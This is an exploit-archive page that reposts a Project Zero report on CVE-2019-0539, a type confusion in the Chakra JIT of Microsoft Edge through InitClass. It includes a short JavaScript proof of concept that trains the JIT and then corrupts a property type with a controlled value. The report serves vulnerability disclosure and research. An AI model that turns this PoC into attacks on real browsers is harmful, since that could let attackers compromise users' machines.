Advertisement






Microsoft Edge Chakra JIT InitClass Type Confusion

CVE Category Price Severity
Author Risk Exploitation Type Date
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019010188

Below is a copy:

Microsoft Edge Chakra JIT InitClass Type Confusion
Microsoft Edge: Chakra: JIT: Type confusion via InitClass 

CVE-2019-0539


This is similar to <a href="/p/project-zero/issues/detail?id=1702" title="Microsoft Edge: Chakra: JIT: Type confusion via NewScObjectNoCtor or InitProto" class="closed_ref" rel="nofollow"> issue 1702 </a>. This time, it uses an InitClass instruction to reach the SetIsPrototype method.

function opt(o, c, value) {
    o.b = 1;

    class A extends c {

    }

    o.a = value;
}

function main() {
    for (let i = 0; i < 2000; i++) {
        let o = {a: 1, b: 2};
        opt(o, (function () {}), {});
    }

    let o = {a: 1, b: 2};
    let cons = function () {};

    cons.prototype = o;

    opt(o, cons, 0x1234);

    print(o.a);
}

main();


This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available (whichever is earlier), the bug
report will become visible to the public.




Found by: lokihardt

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum